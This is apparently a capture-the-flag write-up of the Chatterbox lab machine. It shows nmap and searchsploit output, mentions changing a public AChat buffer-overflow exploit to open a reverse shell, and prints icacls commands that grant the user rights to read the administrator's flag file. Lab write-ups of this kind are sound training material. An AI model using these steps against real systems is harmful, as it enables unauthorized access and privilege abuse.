Chatterbox

OS: Windows, Difficulty: Medium, IP: 10.10.10.74

Initial Enumeration

# Nmap 7.70 scan initiated Mon Jul 29 17:20:46 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 9255,9256 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.40s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 9256/tcp)
HOP RTT       ADDRESS
1   402.86 ms 10.10.14.1
2   404.26 ms 10.10.10.74

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 29 17:21:25 2019 -- 1 IP address (1 host up) scanned in 42.58 seconds

Searchsploit for achat

$ searchsploit achat
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                                                    | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                                                       | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities                                          | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                                                            | exploits/php/webapps/24647.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Metasploit wasn't working for me so I moved to the manual exploitation script, which launched calculator, however, I changed the shellcode to launch a windows/shell_reverse_tcp shell for my kali machine.

User Own

C:\Users\Alfred\Desktop>type user.txt
type user.txt                        
72290***

Root Own

On a little inspection it turns out, I can look at the Administrator folder, however, can not read the root.txt file from it. This seemed very odd.

 Directory of C:\Users\Administrator\Desktop                                                                                                           
                                                                                                                                                       
12/10/2017  07:50 PM    <DIR>          .                                                                                                               
12/10/2017  07:50 PM    <DIR>          ..                                                                                                              
12/10/2017  07:50 PM                32 root.txt                                                                                                        
               1 File(s)             32 bytes                                                                                                          
               2 Dir(s)  18,162,642,944 bytes free         
C:\Users\Administrator\Desktop>type root.txt                                                                                                           
type root.txt                                                                                                                                          
Access is denied.

I checked the permissions I have on the Desktop folder as well as on the root.txt file, it turns out I have FULL control of the file and the folder, all I had to do was grant myself the permission to read the root.txt file.

C:\Users\Administrator>icacls Desktop
icacls Desktop                       
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)                                 
        CHATTERBOX\Administrator:(I)(OI)(CI)(F)                            
        BUILTIN\Administrators:(I)(OI)(CI)(F)                              
        CHATTERBOX\Alfred:(I)(OI)(CI)(F)                    

C:\Users\Administrator\Desktop>icacls "root.txt" /grant "Alfred":F         
icacls "root.txt" /grant "Alfred":F  
processed file: root.txt             
Successfully processed 1 files; Failed processing 0 files                  

C:\Users\Administrator\Desktop>type root.txt                               
type root.txt                        
a673d***

Learning Outcome

Have a look at all the important files first and then determine your strategy, I wasted quite a while without realising that I had FULL access on the required folder.

PreviousSecNotes NextPwnable.kr

Last updated 5 years ago

Was this helpful?

# Nmap 7.70 scan initiated Mon Jul 29 17:20:46 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 9255,9256 10.10.10.74 Nmap scan report for 10.10.10.74 Host is up (0.40s latency). PORT STATE SERVICE VERSION 9255/tcp open http AChat chat system httpd |_http-server-header: AChat |_http-title: Site doesn't have a title. 9256/tcp open achat AChat chat system Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 9256/tcp) HOP RTT ADDRESS 1 402.86 ms 10.10.14.1 2 404.26 ms 10.10.10.74 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jul 29 17:21:25 2019 -- 1 IP address (1 host up) scanned in 42.58 seconds

$ searchsploit achat -------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------------------------------------------- ---------------------------------------- Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32958.txt Parachat 5.5 - Directory Traversal | exploits/php/webapps/24647.txt -------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result

Directory of C:\Users\Administrator\Desktop 12/10/2017 07:50 PM <DIR> . 12/10/2017 07:50 PM <DIR> .. 12/10/2017 07:50 PM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 18,162,642,944 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt Access is denied.

C:\Users\Administrator>icacls Desktop icacls Desktop Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) CHATTERBOX\Administrator:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) CHATTERBOX\Alfred:(I)(OI)(CI)(F) C:\Users\Administrator\Desktop>icacls "root.txt" /grant "Alfred":F icacls "root.txt" /grant "Alfred":F processed file: root.txt Successfully processed 1 files; Failed processing 0 files C:\Users\Administrator\Desktop>type root.txt type root.txt a673d***